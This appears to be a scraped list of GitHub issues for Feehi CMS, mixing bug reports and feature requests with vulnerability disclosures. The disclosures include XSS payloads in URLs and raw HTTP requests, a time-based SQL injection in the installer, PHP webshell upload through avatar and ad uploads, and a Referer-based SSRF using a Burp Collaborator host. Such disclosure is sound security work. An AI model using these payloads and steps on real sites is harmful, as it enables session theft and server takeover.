liufee / cms Goto Github PK

这个文件好像是不存在的

In the background, you can upload the PHP file by changing the image suffix to PHP, resulting in command execution.

url：http://192.168.18.143/admin/index.php?r=admin-user%2Fupdate-self

Hey there!

I belong to an open source security research community, and a member (@0xAmal) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

在安装初期，选择数据库名没有做过滤，导致sql注入

以其中一处举例
install\controllers\SiteController.php 315行
$dbname没有做任何限制

$db->createCommand("use $dbname")->execute();//判断用户名密码是否正确
$this->checkAccountPermission($db, $dbname);

使用burp拦截执行sleep比较，
sleep 响应时间
1 3087m
5 15030m
10 30009m
如下图

修复方式
限制变量$dbname，或修改SQL执行方式
需要加以限制的有3行
315
425
437

你的标签里面没有yii ，建议写上

Stored XSS, also known as persistent XSS, is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application.

Step To Reproduce:

Vulnerable cms URL: https://demo.cms.feehi.com/
Vulnerable Parameter: Comment_nickname:

1-Sing-up https://demo.cms.feehi.com/
2-Inject The XSS Payload in Username: "><script>alert(232)</script> fill all required fields and click the SignUp button
3-Go to any article then XSS will trigger.

Impact:

An XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim, or for phishing attacks.

common/config/main-local.php

没有，怎么处理

1. The administrator will use the beforSave function in the /common/models/AdminUser.php file to modify the avatar.
   This function will call Util's handleModelSingleFileUpload function
   
2. We continue to use the handleModelSingleFileUpload function to find that the function directly calls the upload function without filtering the file name.
   
3. We followed up the saveAs function and found that the temporary file was directly moved to an undetected file name.
   
4. Vulnerability verification
   
   
   
   

Hi，
Parameter tag is vulnerable.It is possible to exploit an XSS vulnerability through the following request
http://demo.cms.feehi.com/index.php?r=search/tag&tag=%3Cscript%3Ealert(document.cookie)%3C/script%3E

You can filter the parameters！！！

Hi i found xss vuln on Feehi CMS Login Form.

What is XSS?
Attacker can inject and executee javascript code to webpage.

Feehi CMS response your input data on webpage. Like

So attacker can inject javascript code into webpage using form request.

POC Videos:

https://youtu.be/aNq_CM_tmHw

Note : youtube videos is unlisted video .So noone can see ,except who has video link.

Yii::$app->user->setReturnUrl(Url::current());之后在 return $this->goBack(); 没有跳转到对应的控制器路径反而跳转到域名/assets/ebd9225d/jquery.js

Calling unknown method: feehi\web\Session::setCacheLimiter(),前台点击文章页出现这个问题

Due to the lax filtering of tag parameters, JS code can be inserted to cause cross-site scripting attacks.If the tag parameter is assigned to "<script>alert(123)</script>".Submitting in get mode can cause cross-site script attack.

The exp code is as follows：
http://127.0.0.1/index.php?r=search%2Ftag&tag=<script>alert(123)</script>

目前UEDITOR编辑器上传地址写死了，复用性太差，建议还是采用模版传递参数的形式来控制，方便二开或者自定义。

如题， 希望能加入下拉按钮组的样式

FeehiCMS 2.0.8.1-hotfix版,前端注册的账密,第二天,就无法使用了.请问是什么原因呢?

Hi i found an xss vulnerability on Feehi CMS backend

What is XSS?

Attacker can inject and executee javascript code to webpage.

log in the user in the background

.png)
So attacker can inject javascript code into webpage using form request.

Not Found (#404)
未找到分类合作伙伴

服务器在处理您的请求中发生了以上错误

如果您认为是我们的服务器错误，请告知我们，谢谢!

这种报错，怎么解决呢

'mailer' => [
'class' => yii\swiftmailer\Mailer::className(),
'viewPath' => '@common/mail',
'useFileTransport' => false,//false发送邮件，true只是生成邮件在runtime文件夹下，不发邮件
'transport' => [
'class' => 'Swift_SmtpTransport',
'host' => ' smtp.163.com', //每种邮箱的host配置不一样
'username' => '[email protected]',
'password' => 'xxxxx',
'port' => '25',
'encryption' => 'tls',
],
'messageConfig' => [
'charset' => 'UTF-8',
'from' => ['[email protected]' => 'Feehi CMS']
],
],

cms后台设置->网站设置：统计代码输入框未进行输入校验可以构造XSS

然后访问前台页面任何链接：

Hi i found cross site scripting vulnerability on Feehi CMS via image upload.

POC:

1. Go to https://demo.cms.feehi.com/admin/index.php?r=article%2Fupdate&id=postid
2. Click on text editor and upload image with file name ">.jpg
3. You got alert

https://youtu.be/c3j-NZY65fQ

1. Top menu on mobile devices does not close while you scroll
2. Menu and search block does not show (show only on top position)
   

使用归档文件安装完然后访问注册或者登录页面会报JQUERY错误index.php?r=site%2Flogin:1574 Uncaught TypeError: jQuery(...).yiiActiveForm is not a function
at HTMLDocument. (index.php?r=site%2Flogin:1574)
at l (jquery.min.js:2)
at Object.fireWith [as resolveWith] (jquery.min.js:2)
at Function.ready (jquery.min.js:2)
at HTMLDocument.A (jquery.min.js:2)

PHP 7.1 report that can not call none-static function checkPermission at backend when first init, once changed the function to be static , problem fixed.

This is a Cross Site Scripting vulnerability. When the user name is <script>alert(1)<script> or js code, the pop-up alert will be triggered when browsing the post. Details are as follows:

POC example:

registered：

POST /index.php?r=site%2Fsignup HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 283
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Fsignup
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601317
Connection: close

_csrf=gTY-NUvHDzoCLFGO7L9d7f4Mtqn3QkRnFFv0yq8jpF6wXllTE51rblN2PNSn8SWluzj73LIaAzBcP8aV2mfQGA%3D%3D&SignupForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&SignupForm%5Bemail%5D=12345678%40qq.com&SignupForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&signup-button=

login：

POST /index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
Content-Length: 296
Cache-Control: max-age=0
Origin: http://demo.cms.feehi.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: Hm_lvt_5c8dd664b2122c4e33710bc08309c5e9=1572536291; Hm_lvt_949aa9449254cd665295a150d530d9c1=1572536091,1572583297; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1572583297; _csrf_backend=587536836a78f5b1b93c7e038d97a0a6af03f097ff9cc90b328fe261e1541b74a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22B3bX5mvAJKkAKwrO2ZxHinLa343w9ogL%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1572536077,1572582746,1572600883,1572600906; BACKEND_FEEHICMS=km3devogu3n3qvlsenfne27eec; _csrf=b19e3b1d941ce5196dd37924e05ac94fe2ace87f75a732fe96ce4d102789e664a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221hgfXZdTQZmZKNxHE4MuEXGWHd2_uDtF%22%3B%7D; PHPSESSID=u69rgiksidqnl78r4n9g45frfn; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1572601432
Connection: close

_csrf=DNiLSKN3vY4TpWeADWU7igas1i5rCbMJ-ewQrKYUQJg9sOwu-y3Z2kL_CtpGK0PCQ5ibWy5R9F6xiCLz01A03g%3D%3D&LoginForm%5Busername%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5Bpassword%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=

registered：

login:

View post：

How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

之前提交过一个bug，说是congif配置文件，后面才发现是后台的staic/js/plugins/ueditor/dialogs/image/image.js里面的文件问题。大概在365行左右有如下代码
accept: { title: 'Images', extensions: acceptExtensions, mimeTypes: 'image/jpg,image/jpeg,image/png' },
只接受jpg、jpeg、png格式的图片上传，添加了image/gif之后就可以选择本地的gif图片上传了。

@

当array存储到JSON字段，就会提示字符串与array格式的问题
类似的问题很多 很多时候表单提交与修改的变量是array，日志就会出错了。

另外 个别文件的命名空间首字母用了大写 LINUX上会找不到文件。

总体说 程序做的很棒，大量简化了开发时间！ 支持下！

原因与 #46 相同, 可以使用相同方式修复

public function beforeValidate()
    {
        if($this->ad !== "0") {
            $this->ad = UploadedFile::getInstance($this, "ad");
        }
        return parent::beforeValidate();
    }

init方法下匿名函数不需要传递$this

Package guzzle/guzzle is abandoned, you should avoid using it. Use guzzlehttp/guzzle instead.

1、菜单->前台菜单->编辑页面->Parent Menu项对应的下拉菜单显示的是后台菜单列表数据
2、运营管理->广告管理->广告类型（txt）之后出现如下错误：
htmlspecialchars() expects parameter 1 to be string, array given
前台的slider_right_2广告处用文本类型或者视频类型广告也会出错，发现源码中没有对广告类型进行判断后再输出相应的类型。

Hi i found an xss vulnerability on Feehi CMS backend

What is XSS?

Attacker can inject and executee javascript code to webpage.

This is a Cross Site Scripting vulnerability appear two place(frontend and backend). When the lang is english"><script>alert(/xss/)</script>< or other js code, the pop-up alert will be triggered when browsing the feehi post. Details are as follows:

POC example:
http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><
or

http://demo.cms.feehi.com/admin/index.php?r=site/language&lang=english"><script>alert(/xss/)</script>

View any post and xss pop-up：

jscode:

Docker cms 体验那里数据库名字写错了，要去里面改下。 另外后台用户名和密码没公布出来啊 admin 123456

self-update的情况下没有setPassword

public $format = ['datetime', 'php:Y-m-d H:m'];
should modify to
public $format = ['datetime', 'php:Y-m-d H:i:s'];

please add rtl support for admin panel. thanks.

This is a Server-side request forgery vulnerability. We can change HTTP Referer Header to any url, then the server will request it. Details are as follows:

We need to send two requests

1. First register an account normally, here my account is test123, and the password is 123456

2. Log out of our account and log in again from the picture below

use burpsuite change the http Referer Header,

The first POC request is as follows

GET http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8oxj66ons65elf2qv4rtf9p7aygo4d.burpcollaborator.net
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254900; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1

3. Login with our account and password

use burpsuite , We don't modify anything

The second POC request is as follows

POST http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Origin: http://demo.cms.feehi.com
Connection: close
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254930; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1

_csrf=kgPC6DtyS_hxWBm1BRhqtuxuO1lKLvtXbXluSk4cmje_MKq5TkJ7iAQATtFcXh38ridoEydKuAY7SiQEAVLPeA%3D%3D&LoginForm%5Busername%5D=test123&LoginForm%5Bpassword%5D=123456&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=

Then we found that the response packet of the second request contained a 302 jump, The jump url is the Referrer header of our first request packet

The response of the second request packet is as follows

4. Vulnerability proof

5. how to fix

https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

如何，想修改管理员头像图片的保存路径。 找了半天没找到地方

This is the base information of the website. It is obviously the latest version of the feehi cms. And in the advertising management of feehi cms v2.1.1, you can upload PHP file by changing the image suffix to PHP, resulting in command execution.

There is an arbitrary file upload vulnerability in the background avatar upload.

The CMS only verified the suffix of the file in the front end by js, and we found that we could upload the PHP scripts directly after using Burp Suite for package capture modification.

The attacker can modify the box in the picture and upload the PHP script directly, It also returns the upload path(In the red box on the right of the figure above).

When the PHP file content is a Trojan, attackers can get the shell directly.

Here I used Behinder as a shell management tool, and getshell successfully.

Hello, i found Host Header Injection at FeehiCMS 2.1.1.

Description:
A Host Header Injection vulnerability in Feehi CMS 2.1.1 may allow an attacker to spoof a particular header. This can be exploited by abusing password reset emails.

PoC:
https://www.youtube.com/watch?v=k8dp0FJnSsI&ab_channel=IkariShinji

问题一：
上传出现双"/" 导致无法访问
https://www.xxx.com**//**uploads/ueditor/upload/image/20200211/xxxx.png
问题二:
使用了cdn所有想修改访问域名 请问如何修改

There is only "yii.bat" in the root directory, missing "yii". It is unfriendly to *nix developers.

后台用百度编辑器上传图片时，选择不了gif动画图片，jpg图片可以选择。

例如文章，使用每篇文章后面的删除不起作用，而且页面一直处于删除状态，毫无反应；但是可以使用最上面的那个删除，选中文章后删除，是可以的，这是为什么？难道只有我存在这种问题吗?

Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0

Warning: Cannot modify header information - headers already sent in Unknown on line 0
[]

首先我觉得作者的这种想法非常好。基于框架，以前我也尝试过多次从最初的ioize 到现在的laravel october 。一直在找寻一款比较优秀的cms. fee嗨让我看到了希望。谢谢作者。
建议融入layerUI2 ，后台增加下载模型，广告位管理，等

Reference : https://github.com/yiisoft/yii2/blob/master/docs/guide/db-active-record.md#lazy-loading-and-eager-loading-